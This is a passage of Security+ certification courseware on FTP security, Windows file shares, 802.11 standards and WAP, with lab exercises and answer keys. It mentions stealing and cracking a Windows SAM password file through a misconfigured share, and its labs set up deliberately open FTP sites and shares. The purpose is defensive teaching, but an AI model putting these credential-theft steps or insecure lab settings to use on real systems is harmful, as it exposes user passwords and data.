C:\ >ftp leech.stat.umn.edu Connected to leech.stat.umn.edu. 220 leech.stat.umn.edu FTP server (Version wu-2.4.2academ[BETA-18](1) Thu Sep 2 GMT 2001) ready. User (leech.stat.umn.edu:(none)): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Please read the file README 230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024 days ago 230 Guest login ok, access restrictions apply. ftp>
In the first line of this transcript, the user issued a command to run the FTP client and connect to the site called leech.stat.umn.edu. The user could just as easily have entered the servers IP address. In the second line, you see the connection was successful, and in the following line, the FTP server has provided some basic information about itself. Its running version 2.4.2 of wu-ftp. The server immediately provides the User prompt so the user can log on to it.
714
CompTIA Security+ Certification Here you see the user provided the login of anonymous to get access with visitor privileges. The server has been configured to accept the anonymous login account; it requests the user provide his or her e-mail address as a password, although any string of characters is often accepted by anonymous FTP servers. After the password was entered, the server prints a brief banner message instructing the guest to read the file README. You know the anonymous user credentials were accepted, because the server noted Guest login ok. Finally, you see the ftp> prompt, indicating the user is now able to enter an FTP command. Although properly secured and monitored anonymous FTP sites are a valuable and wellused Internet resource, unmonitored anonymous FTP servers can often be used as storehouses for warez (pirated software with the copy protection mechanisms removed). Pirates use anonymous FTP sites for storage because they often have more bandwidth than their own Internet connections, making it easy to share and trade their warez. Companies that do not monitor their anonymous FTP sites for this type of behavior risk a black eye in the public relations arena if it becomes known that their servers are used for this type of illegal activity. A potentially worse situation could arise if the anonymous account is not properly restricted to access only designated directories. If an anonymous FTP server is misconfigured and permits anonymous visitors to write to any directory, then malicious visitors could upload files that would result in their gaining root access and control of the server. Even if the malicious user could only read any directory, then he could download files containing user passwords and decrypt them using password cracking tools. If you decide to setup an anonymous FTP server, be sure its properly secured. CERT provides a document entitled Anonymous FTP Configuration Guidelines to help in this task. It is available at:
www.cert.org/tech_tips/anonymous_ftp_config.html.
A variant of the anonymous FTP site is a blind FTP site. With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. Blind FTP sites offer more security than anonymous sites, because the user must know the exact filename of a desired file in order to download it. There is still no way to account for who has logged on to the server and accessed a given file. If a user who is given a particular filename by an administrator chooses to share it with others, then the privacy sought by setting up the blind server is compromised.
715
FTP countermeasures
Its clear from aforementioned issues that FTP is an easy target for hackers. There are, however, solutions to the FTP quandary: Do not allow anonymous access unless a clear business requirement exists to do so. Employ a state-of-the art firewall such as a Cisco PIX or Check Point FireWall1 that performs content inspection of FTP commands. Ensure your FTP server has the latest security patches and that it has been properly configured to limit user access. Encrypt your data before placing it on an FTP server, so it cannot be sniffed in transit to its destination. The recipient needs the appropriate keys to decrypt the data once it has been received. Encrypt the FTP data flow using a Virtual Private Network (VPN) connection. Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol outlined in the next section.
716
Do it!
B-1:
Creating a new FTP site Heres why

(If necessary.) This activity requires that you pair up with a partner. On each server, you and your partner will create an ftp site and test its connection.
Heres how
Students will work in pairs for this activity.
1 Log on to your server as administrator
2 Create a folder called ftp located in the root directory of your system 3 Click Start and then right click
My Computer
Choose Manage 4 Expand Services and

Applications
The Computer Management window appears.
5 Expand Internet
Information Services
6 Expand FTP Sites
7 Right-click FTP Sites Choose New, FTP Site 8 Click Next 9 Enter My FTP Site Click Next 10 Click Next 11 Click Next 12 In the path box, type c:\ftp 13 Click Next 14 Check Write Click Next
To keep the default settings for the IP Address and TCP Port Settings. To accept the default of not isolating users. If your root directory is different than c:\, substitute the root directory on your system. The FTP Site Access Permissions screen appears. For the description. The FTP Site Creation Wizard will begin.
Directory and file transfer services 15 Click Finish
717
(To close the Wizard.) Notice that your ftp site is stopped. To start your ftp server, youll have to first stop the Default FTP Site In Computer Management.
16 Right-click Default FTP site Choose Stop 17 Right-click My FTP site

(Stopped)
Choose Start 18 Click Start and then choose

Run To open a Command window. You will try logging onto your partners FTP site.
Type cmd and press e 19 At the command prompt, enter

ftp
20 At the ftp prompt, type

open <your partners IP address>
Press e 21 Enter anonymous 22 Enter password 23 Enter quit

As the user. As the password. You will be connected. To end the ftp session.
718
Requiring authentication
Explanation The default setting for an FTP site is to allow anonymous access; however, there are times when its necessary to control access. The Windows Server 2003 FTP Server service has capabilities to remove anonymous access and require user authentication. The major risk when switching to authentication is that the usernames and passwords are sent in clear text, which can be sniffed with a protocol analyzer.
Do it!
B-2:
Controlling access to the FTP site Heres why

To deny anonymous access to your ftp site.
Heres how
1 Switch to the Computer Management window and rightclick My FTP Site Choose Properties 2 Activate the Security Accounts tab
3 Clear Allow anonymous

connections
Youll receive the message shown below.
Click Yes 4 Click Apply
Directory and file transfer services 5 Switch to the Command window and enter ftp 6 At the ftp prompt, enter open
<your partners IP address>
719
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
7 Enter anonymous 8 Enter password
For the username. For the password. The login will fail because a valid account with a password is required. Anonymous access will no longer be allowed, but there is a risk of having the password sniffed on the network.
9 At the ftp prompt, enter user Enter user1 Enter the password for the User 1 account 10 Enter quit
To reattempt login. For the username. You'll be connected.
To end the ftp session.
720
The threat of password sniffing

Explanation Removing anonymous access to an FTP site makes it vulnerable to password sniffing. One way to counter this vulnerability is to restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer. This method can be very effective in preventing someone on the outside from using a sniffer to obtain a username
Do it!
B-3:
Configuring FTP TCP/IP restrictions Heres why
Heres how
1 Switch to the Computer Management window 2 Activate the Directory Security tab
3 Click Add
4 Enter the IP address of your partners server Click OK 5 Click Apply
Directory and file transfer services 6 Switch to the Command window and at the ftp prompt, enter open
<your partners IP address>
721
Make sure both partners have completed step 5 before they continue with step 6. The remainder of the activity might not work correctly.
7 At the ftp prompt, enter user1 Enter the password for the User 1 account 8 Enter quit 9 Close the Command window 10 When both you and your partner are finished testing the ftp connection, return to the Directory Security tab and remove your partners IP address 11 In Computer Management, stop the My FTP Site and restart the Default FTP Site
To reattempt login. Youll be denied access because your IP address has been denied access. (To end the session.)
Expand Services and Applications, expand Internet Information Services, and expand FTP Sites to stop/start the ftp sites.
12 What are the options available for TCP/IP Access Restrictions? (Choose all that apply.)
A
Granted access Enable access Denied access Full access
B
C
13 If an IP address has been denied access to an FTP server: A B C

D
Users can logon using the administrator password Users can logon using their password Users can logon using an Anonymous account Users will not be able to access the server
14 All IP addresses are granted access by default. True or false?

True
15 Close Computer Management
722
Secure file transfers

Explanation Several attempts have been made to address FTPs security shortcomings. RFC 2228, FTP Security Extensions, was released in 1997 to address the issue of FTPs clear text authentication, but it has not been widely adopted. Several propriety Secure FTP products have also been released by various vendors, offering secure authentication (and in some cases secure data transfer) but have been given a lukewarm reception in the marketplace. Other strategies to secure FTP have involved conducting file transfers through an encrypted tunnel via an SSL or IPSec VPN.
S/FTP
The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following description of S/FTP: S/FTP is an interactive file transfer program, similar to ftp, which performs all operations over an encrypted ssh transport. It might also use many features of ssh, such as public key authentication and compression. S/FTP connects and logs into the specified host, then enters an interactive command mode. The key words in this quote are similar to ftp, because of the protocols name, Secure FTP, one might expect that S/FTP is a method of securing traditional FTP, but it is not. The only relationship between S/FTP and traditional FTP is that S/FTP employs the older variants command syntax. Rather than a protocol, S/FTP is an FTPlike program provided as part of the SSH suite to securely transfer files. S/FTP does not provide any new network protocols; it only provides an FTP-like user interface to use the existing SSH2 encryption mechanisms to transfer files. Notice that SSHs Secure File Transfer Protocol (S/FTP) should not be confused with the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to implement than the original FTP, and the former is not a protocol at all, but a program that leverages SSH to securely transfer files between hosts. Secure Shells S/FTP standard has a number of benefits over traditional FTP: S/FTP uses the underlying SSH2 protocol, so it offers strong authentication using a variety of methods including X.509 certificates. It uses SSH2, S/FTP encrypts authentication, commands, and all data transferred between the client and the server using secure encryption algorithms. SSH2 uses a single, well-behaved TCP connection (as compared to active FTP, which opens a reverse connection, and passive FTP, which opens a connection on a random high port) it is easy to configure a firewall to permit S/FTP communications. S/FTP uses the same TCP port as SSH2, port 22. Traditional FTP clients and servers negotiate the IP address and port for opening the data connection, its difficult to use Network Address Translation (NAT) on FTP connections. S/FTP avoids this issue altogether because no negotiation is required to open a second connection.
Directory and file transfer services The following table displays SecureFTP implementation programs:
Program SSH Note
723
The SSH product produced by the company of the same name, offering both server and client software. http://ssh.com/support/downloads/ An open source version of SSH. http://sshwindows.sourceforge.net/ A freeware SSH client implementation for Windows operating systems. www.chiark.greenend.org.uk/~sgtatham/putty/
OpenSSH PuTTY
724
Do it!
B-4:
Understanding file transfer services

1 Provide the TCP port numbers for the following FTP sessions: Active FTP source port Active FTP destination port Passive FTP source port Passive FTP destination port FTP command source port FTP command destination port
20 >1023 >1023 >1023 >1023 21
2 FTP traffic is sent unencrypted in clear text. True or false?

True
3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. True or false?
True
4 In passive FTP, the server initiates the data connection to the client. True or false?
False
5 The terms active and passive in FTP refer to the clients role in setting up the data connection. True or false?
False: It refers to the servers role.
6 Secure File Transfer Protocol (S/FTP) is an extension of FTP. True or false?

False: It is a new component of the Secure Shell protocol.
7 Audits for file shares should be conducted in complete secrecy. True or false?
False: Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented.
725
Topic C: File sharing

# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts File Sharing Vulnerabilities Packet Sniffing
File shares
Explanation A common way of sharing files is using file shares on a Microsoft Windows network. This method was originally intended to share files on a local area network (LAN) rather than across the Internet as FTP is used, although current versions of Windows allow mapping via IP connections. File shares are popular because they are easy to set up, and they use the Windows graphical interface. Very little computer knowledge is required for people to share files across the network using file shares; one simply views the files or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.
Exhibit 7-5: File sharing in Windows Server 2003 Shared files can be configured as peer-to-peer (so that multiple desktop computers can access files on another desktop computer) or as client/server shares (set up to provide users with centralized network storage on a server).
726
Vulnerabilities
Although file shares seem both harmless and indispensable, there are indeed several risks that security administrators need to manage carefully. First, there is the risk of confidentiality of data, because most users control file sharing on their own desktop computers, they can open shares on their machines that could accidentally become liabilities. Take for example an accountant who shares his My Documents folder to let his coworkers access his collection of MP3 music files. If the accountant accidentally saves a spreadsheet containing the salaries of all employees into the same folder, he could inadvertently give confidential information to people who should not have access to it. Second, there are viruses that spread via network shares. If many users on the network have unmonitored and uncontrolled network shares, they can cause malware such as the Funlove virus to spread rapidly, damaging files and causing huge losses to productivity as administrators battle the infection and workers are unable to perform their functions because their programs no longer work. Finally, other types of critical information besides user documents could become compromised if file shares are misconfigured. One example of this is the C: drive on Windows machines. If the entire drive were accidentally shared, then an attacker has the ability to access important files in the C:\Windows directory. In this case, an attacker could launch a denial-of-service attack on the machine by deleting critical files, or could download the SAM file that contains the username and password of everyone who has ever logged onto the machine. After downloading the SAM file, an attacker can crack it using tools such as L0phtCrack.
Protecting your file shares

To protect your network from the risks posed by unauthorized file shares, your organization needs to define a policy regarding the use of file shares. After the policy has been defined and communicated to all users as part of a security awareness program, security administrators can take action to ensure the policy is respected by conducting audits of file shares. Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented. Most commercial scanning and audit tools can identify file shares. Freeware scanners for file shares include: Legion http://packetstormsecurity.org/groups/rhino9 SMBScanner
http://home.ubalt.edu/abento/753/enumeration/enumerationtoo ls.html
For more details on how to use these tools and auditing best practices, see Jaime Carpenters article entitled Open File Shares: An Unexpected Business Risk at the SANS Reading Room ( www.sans.org/rr/).
Directory and file transfer services Do it!
727
C-1:
Understanding file sharing

1 Which of the following features is true of file sharing?
A B C D
Can share files on a LAN Can share files over an IP connection Can be configured as peer-to-peer Can be configured as client/server
2 What are some of the risks associated with file sharing? A B C

D
Sharing confidential data Spreading viruses Compromising system files All of the above
3 What are some recommendations for protecting file shares?

Define a policy and communicate it to all users Conduct audits of file shares
728
Unit summary: Directory and file transfer services

Topic A In this topic, you learned that LDAP eliminates the necessity to authenticate at multiple servers in order to access different applications and network resources. Using X.500 directory services, LDAP simplifies both the logon process and administration of all network resources. In this topic, you learned that ftp is a file transfer mechanism commonly used on the Internet. You learned that ftp is not a secure protocol and that S/FTP, which is based on SSH version 2, is the recommended solution. In this topic, you learned that uncontrolled file shares on Windows networks could be a potential weak spot in many networks. File shares should be centrally administered on file servers, and periodic audits should be conducted to identify and remove unauthorized file shares.
Topic B
Topic C
Review questions
1 Information about network resources is stored as a(n) __________ in the directory services database.
object
2 A commonly used directory service protocol that was developed by the IETF is __________.
LDAP
3 The Microsoft implementation of directory services is called ________________________.

Active Directory
4 PKI, user administration, and single sign-on are some of the applications of LDAP. True or False?
True
5 List the elements in the X.500 hierarchical structure from the top to the bottom.
Root, country, organization, organizational unit, leaf objects
6 Distinguished names do not need to be unique. True or False?

False
7 LDAP provides authentication and authorization services. It also provides encryption by utilizing other protocols. True or False?
True
8 List the security vulnerabilities you need to protect your LDAP service from.
DoS, man-in-the-middle, and attacks against data confidentiality
729
9 List the steps you can take to secure the LDAP server from the vulnerabilities that can affect it.
Apply the latest OS and application security patches, remove unneeded services and applications, configure strong authentication, block LDAP at the firewall.
10 FTP is one of the most secure services on the Internet. True or False?
False
11 Which TCP port is used to initiate an FTP session?

Port 21
12 Compare active FTP and passive FTP.

In active FTP, which is FTPs default operation, the FTP server creates a data connection by opening a TCP session using a source port of 20 and a destination port greater than 1023. In passive FTP, which is not supported by all FTP implementations, the client initiates the data connection to the server (therefore, the server is said to be passive because its only accepting a connection instead of originating one).
13 List some of the FTP security issues you should guard against.
Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.
14 The default settings for an FTP site is to require usernames and passwords. True or False?
False: The default is anonymous access.
15 How can you prevent password sniffing when users are connecting to an FTP server?
Restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer.
16 List the vulnerabilities of using Windows file shares.

Risk to confidentiality of data, viruses spreading via network shares, and other types of critical information besides user documents could become compromised if file shares are misconfigured.
17 File shares are peer-to-peer only. True or false?

False: They can also be client/server shares.
18 List some ways you can protect file shares.

Establish a policy and communicate it to users. Audit the network to ensure that the policy is being followed.
19 List some methods of securing FTP file transfers.

Using Secure FTP products, conduct file transfers through an encrypted tunnel via SSL or IPSec VPN.
20 S/FTP is simply a re-write of the FTP service. True or False?

False: It is a component of the SSH protocol.
730

In this activity, youll configure a file share on a Windows network: 1 Open My Documents in Windows. 2 Right-click in the right pane and choose New, Folder. 3 Rename the new folder to Dangerous. 4 Right-click the Dangerous folder, and choose Properties. 5 Activate the Sharing tab. 6 Select Share this folder. 7 Click OK. 8 Create a new text document, and save it to the Dangerous folder. 9 On another computer in the network browse to Dangerous through My Network Places. 10 Open the text file and modify it. 11 Were you able to open the file? Were you able to save the file? Why or why not?
You should have been able to open the file, but you shouldnt have been able to save the file. Default permissions on the folder only allow the group Everyone to Read the file.
12 On your computer, display properties for the Dangerous folder. Change the permissions for the group Everyone to allow Change. (Activate the Sharing tab, click Permissions, check Change in the Allow column.) 13 On the other computer, try saving the file again. 14 Were you able to save it now?
Yes
15 On the first computer, check the text file for modifications. Next, youll scan your own computer for file shares using Legion. This file can be found under packetstormsecurity.nl/groups/rhino9/. 16 Download the file legionv21.zip according to your instructor's directions. 17 Unzip the file to C:\Security. 18 Run the Setup program Setup.exe. 19 Click Next at the Welcome screen. 20 Click Next at each screen to accept the defaults. Click Finish to exit the installation program. 21 Click Start, then choose All Programs, Legion to run the program. 22 Enter the starting IP address in the Scan from text boxes. 23 Click Scan. 24 What file shares were detected on your computer?
Dangerous should appear in the share list.
25 Close Legion.
81
Unit 8 Wireless and instant messaging

A Discuss 802.11 standards. B Describe the Wireless Application Protocol
(WAP) and explain how it works.

C Describe Wired Equivalent Privacy (WEP). D Discuss instant messaging.
82
Topic A: IEEE 802.11

# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts 802.11 and 802.11x
IEEE 802 LMSC

Explanation In 1980, the Institute of Electrical and Electronics Engineers (IEEE) created the 802 LAN/MAN Standards Committee (LMSC). This committee was tasked to create standards of operability related to local area networks (LANs) and metropolitan area networks (MANs). In 1990, the committee formed the 802.11 working group to define the interface between wireless clients and their network access points. The 802.11 working group finalized its first standard in 1997. IEEE 802.11 defines three types of transmission at the Physical (PHY) layer: Diffused infrared, based on infrared transmissions Direct sequence spread spectrum (DSSS), based on radio transmissions Frequency hopping spread spectrum (FHSS), also based on radio transmissions WEP was established as an optional security protocol. The group also specified the use of the 2.4 GHz industrial, scientific and medical (ISM) radio band because it was the only band was available and unlicensed in most countries of the world. Within this band, the group limited its work to the Physical layer and the Media Access Control (MAC) sublayer of the Data Link layer, leaving the Logical Link Control (LLC) sublayer and higher layers of the OSI model to existing standards. The group also mandated a 1 Mbps data transfer rate and an optional 2 Mbps data transfer rate. As the 802.11 project developed, the members of the working group found it necessary to add additional working groups to more efficiently tackle their task. As these subgroups were added, each was designated with a letter, starting with a and going through j. The four most prominent of these groups have been 802.11b, 802.11a, 802.11i, and 802.11g. Some of these working groups have already approved new standards, others are still working, and two others, 802.11c and 802.11j, have been respectively folded into another working group or disbanded. Two other 802 working groups, 802.15 (covering wireless personal area networks or Wireless PANs) and 802.16 (covering wireless metropolitan area networks or Wireless MANs), are also working on wireless standards. These standards are only briefly mentioned since they are not covered on the exam.
83
802.11a
The IEEE approved the 802.11a standard in 1999 and titled it High-speed Physical Layer in the 5 GHz Band. This standard sets specifications for an additional type of data transmission at the Physical layerthe Coded Orthogonal Frequency Multiplexing (COFDM) protocol. The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54 Mbpsa major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The radios consist of either wireless NIC cards or wireless access points (APs), and they operate by converting the digital and analog signals between the client and the wired network. Communications are established at the fastest possible data rate, which is dependent upon the distance between the client and network and the strength of the signal. One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to compete with many other devices, such as cordless phones, microwave ovens, and baby monitors (though baby monitors are usually not a problem in a corporate environment).
802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE named the 802.11b standard the Higher-Speed Layer Extension in the 2.4 GHz Band. The IEEE also established specifications for an additional type of data transmission at the Physical layerthe High-Rate Direct Sequence Spread Spectrum (HR/DSSS) protocol. This protocol allows for data transmission at either 5.5 Mbps or 11 Mbps (which is as fast as standard Ethernet and much faster than most Internet connections) instead of the mandatory 1 Mbps or the optional 2 Mbps data transmission rate offered by the original 802.11 standard. In 2001, the 802.11b standard came under heavy criticism because of security flaws in WEP. The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and certification group, created a standard based on 802.11b that is dubbed Wi-Fi, a trademark that is short for wireless fidelity.
802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop MAC bridging functionality. This group was folded into the 802.1D standard. 802.1D is focused on MAC bridging in wired LANs and should not be confused with 802.11d.
802.11d
The IEEE working group D is responsible for determining the requirements necessary for 802.11 to operate in other countries and incorporating those requirements into 802.11d. The work of this group continues.
84
802.11e
The IEEE working group E is responsible for creating the 802.11e standard, which will add multimedia and Quality of Service (QoS) capabilities to the MAC layer and therefore guarantee specified data transmission rates and error percentages. This proposal is still in draft form. When this work is completed, it will have a beneficial affect on 802.11a, 802.11b, and 802.11g. The 802.11e standard will also impact 802.15, which is assigned the task of creating wireless personal area networks (Wireless PANs), and 802.16, which is assigned the task of creating Wireless MAN standards. Without an improvement in QoS, many of the benefits of higher rates of data transmission, such as video streaming and wireless Voice over IP (wireless VoIP), will not materialize.
802.11f
The IEEE working group F is responsible for creating the 802.11f standard, which will allow for better roaming between multivendor access points and distribution systems (different LANs within a WAN) than is currently feasible under 802.11.
802.11g
The IEEE working group G created a draft 802.11g standard, was approved in June 2003. This standard offers a raw data throughput rate of up to 54 Mbpsfive times higher than 802.11b. The 802.11g specification is backward compatible with the widely deployed 802.11b standard.
802.11h
The IEEE working group H is responsible for creating 802.11h, which is required to allow for European implementations requests regarding the 5 GHz Physical layer. Two requirements of this standard are that it limits the PC card from emitting more radio signal than is needed and allows devices to listen to radio wave activity before picking a channel on which to broadcast. This standard was approved in 2003.
802.11i
The IEEE working group I is responsible for fixing the serious security flaws in WLANs by developing new security standards. This standard was approved in 2004, however, its apparent that its initial medium-term intent was to create a new standard that would be at least somewhat backward compatible with the original WEP so that a total transformation of existing equipment need not be necessary. This fix will probably involve increasing the number of required bits in the temporal keys to 128, the use of fast packet keying, and key management. In the long term, the working group hopes to eliminate WEP altogether and replace it with what it is calling the Temporal Key Integrity Protocol (TKIP), which would require that keys be replaced within a certain amount of time. As discussed in the WEP section of this unit, WEP does not currently require these keys be replaced at all.
85
802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5 GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was approved in November 2004. A summary of IEEE 802.11 working groups is provided in the following table:
Working group 802.11a Primary task Worked to establish specifications for wireless data transmissions in the 5 GHz band Worked to establish specifications for wireless data transmission in the 2.4 GHz band Worked to establish wireless MAC bridging functionality Working to determine requirements that will allow 802.11 to operate outside the United States Worked to add multimedia and Quality of Service (QoS) capabilities to wireless MAC layer Worked to allow for better roaming between multivendor access points and distribution systems Worked to provide raw data throughput over wireless networks at a rate of up to 54 Mbps Worked to allow for European implementation requests regarding the 5 GHz band Worked to fix security flaws in WLANs by developing new security standards Worked to address meeting Japanese government requirements for 4.9 to 5 GHz band use. Status of work Approved 1999
802.11b
Approved 1999
802.11c
Folded into 802.1D
802.11d
Approved 2001
802.11e
Approved 2005
802.11f
Approved 2003
802.11g
Approved 2003
802.11h
Approved 2004
802.11i
Approved 2004
802.11j
Approved 2004
The IEEE is dealing with all of the technology issues that arise as it tries to set standards for wireless data transmission and processing. At some point, all of these groups will have completed their work, and other challenges will arise that need to be dealt with as time goes on.
86
Do it!
A-1:
Discussing IEEE 802.11 protocol

1 The IEEE work groups were named in sequential alphabetical order from which of the following? (Choose all that apply.) A B
C
a through f a through i a through j a through m
2 Which of the following are physical layers as defined by 802.11 protocols?

A
DSSS COFDM FHSS Diffused infrared MAC
B
C D
3 Which of the following data transmission rates does 802.11b support? (Choose all that apply.) A
B
1 Mbps 5.5 Mbps 10 Mbps 11 Mbps 54 Mbps
C
D
4 The 802.11g protocol will offer throughput rates of up to _______. A B

C
10 Mbps 22 Mbps 54 Mbps 128 Mbps
5 Which of the following working groups is responsible for fixing the security flaws in WLANs? A
B
802.11j 802.11i WAP Forum 802.1x 802.11g
C D E
Wireless and instant messaging Do it!
87
A-2:
Creating a wireless network (demonstration only) Heres why

The first step in creating a wireless network is to install and configure the router or wireless access point (WAP). In this activity, youll use a Linksys WAP11 Wireless Access Point to connect wireless devices. The Linksys WAP11 is initially installed from CD and can then be configured through a browser.
Heres how
Introduce this activity as a demonstration. Students should observe only.
1 Connect the Category 5 Ethernet network cable to the Linksys WAP11 Access Point
2 Connect the other end of the cable to the classroom switch or hub 3 Connect the AC Adapter to the WAP11 power port and to an electrical outlet
Use the Instructors PC to demonstrate the installation procedure.
The Access Point is now connected to your 10/100 network. To avoid damage to your unit, only use the power adapter supplied with the Access Point.
4 At the laptop PC, insert the Linksys Setup Wizard CD in the CD-ROM drive
The Welcome Screen appears. If the autorun program does not start, choose Start, Run, and enter D:\setup.exe (if D: is your PCs CD-ROM drive).
5 Click Setup
The Connecting the Wireless Access Point screen appears.
6 Click Next
88
CompTIA Security+ Certification 7 Click Next

The initial Setup screen appears.
Click Yes 8 In the Password field, enter the default password, admin
(To change the settings.) The system prompts for a password.
Click OK 9 Change the IP Address and the

Subnet Mask (If necessary to conform to the classroom setup.) The IP Address must be unique to your network. You can assign any unique name to the Access Point.
Change the AP Name
When finished, click Next 10 In the SSID field, type SECCLASS
The Basic Settings screen appears.
Changing the SSID field from the default is important in order to protect the LAN from intrusion.
Click Next
Wireless and instant messaging 11 Click Next
89
(To continue through the Security (Optional) screen.) The Confirm Your Network Settings screen appears.
12 Review your settings, then click

Yes
Your changes are saved.
Click Exit
(To complete the basic setup.) The Access Point is now configured for the classroom network.
810
Topic B: WAP 1.x and WAP 2.0

# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) WTLS (Wireless Transport Layer Security)
The WAP protocol

Explanation The Wireless Application Protocol (WAP) is an open, global specification that is designed to deliver information and services to users of handheld digital wireless devices, such as mobile phones, pagers, personal digital assistants (PDAs), smart phones, and two-way radios. Its designed to be compatible with most wireless networks including CDPD, CDMA, DataTAC, DECT, FLEX, GPRS, GSM, iDEN, Mobitex, PDC, PHS, TETRA, TDMA, and ReFLEX. WAP can be built on any operating system including PalmOS, EPOC, Windows CE, FLEXOS, OS/9, and JavaOS. WAP was developed by the WAP Forum to provide open protocol specifications to enable access to the Internet across different transport options and on many devices. The WAP Forum was founded in 1997 by Unwired Planet (now Phone.com), Ericsson, Motorola, and Nokia. The WAP Forum no longer exists as an independent organization. The Open Mobile Alliance (OMA) now includes the WAP work (www.openmobilealliance.org/tech/affiliates/wap/wapindex.html). The WAP Forum is not a standards body, as is the IEEE, but it does work closely with standards bodies such as the IEEE, W3C, ETSI, TIA, and AMIC. The WAP Forum currently has a member list of over 230 companies, made up of handset manufacturers, carriers, software developers, and other companies. Its board of directors comprises industry representatives from Motorola, Sprint PCS, Ericsson, IBM, Intel Corporation, Microsoft, NEC Corporation, Nokia, NTT DoCoMo, Sun Microsystems, Texas Instruments, Vodafone, and others. Like the IEEE, the WAP Forum has formed various working groups to focus on different aspects of wireless data communication and mobile commerce (m-commerce). The WAP Forum was formed in the middle of a meteoric rise in the use of mobile phones and the Internet. As the major mobile phone companies saw their markets start to saturate, particularly in Europe and Asia, they realized that, if they were to continue their rapid growth, they would need to add new features and services to their phones. The idea of bringing the Internet to handheld devices was very appealing. Unlike traditional Internet users that view content-rich Web material on large screens using computers equipped with high-speed processors, large amounts of memory, and keyboards over telephone and high-bandwidth access lines such as cable and T1 lines, mobile device users would be constrained by the need to use handheld devices. As shown in Exhibit 8-1 and Exhibit 8-2, these devices have very small viewer screens, clumsy user interfaces (only number keys in the case of a mobile phone), much slower processors, limited memory, and much lower bandwidth (typically only 9600 bps). In order for mobile device users to gain access to the Internet, significant changes needed to be made.
811
Exhibit 8-1: Sanyo Sprint SCP-6000 WAP-enabled phone
Exhibit 8-2: Handspring Treo 270 WAP-enabled communicator
812
The WAP 1.x stack

Like data transmissions between wired network devices, wireless devices need to be able to communicate with data sources over a network. With the slow processor speeds of handheld devices and the latency caused by limited bandwidth, the WAP Forum needed to modify the OSI Model and create its own set of protocols called the WAP stack. Once you have an understanding of the components of the WAP stack, you can discuss how a WAP-capable client (usually a wireless phone, communicator, or PDA) requests and receives information over the Internet. Comparison to the OSI model WAP 1.x was based as closely as possible on the OSI Model so it could interact with the Internet, but there are some significant differences between the two. The following table compares the WAP 1.x stack to the OSI stack. Notice these layers do not correspond exactly together and that the table is simply a conceptual tool to help you understand some of the similarities and differences between the two models. Some of the most notable differences are: There are five layers in the WAP 1.x stack that would lie within the top four (of seven) layers of the OSI Model. The transaction and security layers of the WAP 1.x stack are new. (Although one could conceptually place SSL and TLS here, those protocols are actually Session and Application layer protocols in the OSI model.) No network layer exists, as WDP at the Transport layer performs many of these functions in combination with the Bearer protocols. WAP is much leaner than the OSI Model in that each of its protocols has been created to make data transactions as compressed as possible and to allow for many more dropped packets than the OSI Model.
Layer Application Session Transaction Security Transport Lower layer(s) WAP 1.x Wireless Application Environment (WAE) Wireless Session Protocol (WSP) Wireless Transaction Protocol (WTP) Wireless Transport Layer Security (WTLS) Wireless Datagram Protocol (WDP) Bearers (GPRS, TDMA, CDMA, and so on) SSL/TLS TCP/IP, TCP/UDP IP, Data Link layer, Physical layer OSI/Web HTML, JavaScript, and others HTTP
813
These protocols were based on the International Organization for Standardization OSI Model, but were different enough from it to require that data communications between clients (wireless devices) and servers pass through a WAP gateway, which in effect converts the data from one type of network protocol to another. The Wireless Application Layer (WAL) corresponds to the HTML layer, but unlike the HTML layer, which allows for a wide variety of content formats that can consume large amounts of processing power and be displayed on large computer screens, WAE was designed only to specify lightweight formats, such as text and image formats, and to leave decisions related to browser types, phonebooks, and the like to device vendors. The Wireless Session Protocol (WSP) provides connection- and connectionlessoriented session standards that require a relatively limited amount of information exchanges between the wireless device and the server compared to the number of information exchanges required between a wired device and the server. Connection-oriented session services that require reliable data transmission operate over the Wireless Transaction Protocol (WTP) layer while connectionless-oriented session services operate over the Wireless Datagram Protocol (WDP). The WTP operates over the WDP or the optional WTLS layer. This layer allows for either reliable or unreliable transactions and, like other WAP 1.x layers, has been designed to limit the number of transactions necessary to allow data transport, relative to the number of transactions necessary in the OSI/Web stack. The Wireless Datagram Protocol (WDP) is the bottom layer above the carrier layer. WDP differs greatly from the UDP layer of the OSI/Web stack in that it allows operability of a great variety of mobile networks while the UDP layer must operate over an IP network. Another significant difference between wireless and wired data transfer lies in the network architectural structures of the two network types. Exhibit 8-3 illustrates the differences between a WAP network and a wired networks architecture.
Exhibit 8-3: WAP vs. wired network
814
WAP 1.x security

